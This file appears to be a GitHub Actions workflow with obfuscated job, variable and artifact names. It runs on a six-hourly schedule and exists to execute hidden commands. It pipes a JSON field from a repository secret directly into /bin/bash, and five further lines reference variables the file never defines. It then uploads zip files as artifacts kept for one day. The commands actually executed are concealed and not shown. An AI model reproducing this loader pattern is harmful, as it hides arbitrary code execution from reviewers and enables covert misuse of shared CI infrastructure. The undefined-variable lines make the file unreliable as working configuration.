name: xiangweiyongsheng
on:
  workflow_dispatch:

  schedule:
    - cron: '41 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiangweiyongsheng
        env:
          lerz283: ${{ secrets.lerz283 }}
        run: |
          printf '%s' "$lerz283" | jq -r .lmu4896 | /bin/bash
          printf '%s' "$ufl350" | jq -r .vm8728 | /bin/bash
          printf '%s' "$e86135" | jq -r .haawk8503 | /bin/bash
          printf '%s' "$tvyn23776" | jq -r .b8 | /bin/bash
          echo $jrpoe78073 | jq -r .kh7489 | /bin/bash
          printf '%s' "$ob476" | jq -r .dhv820 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: tvT7WcWh
          path: "*.zip"
          retention-days: 1
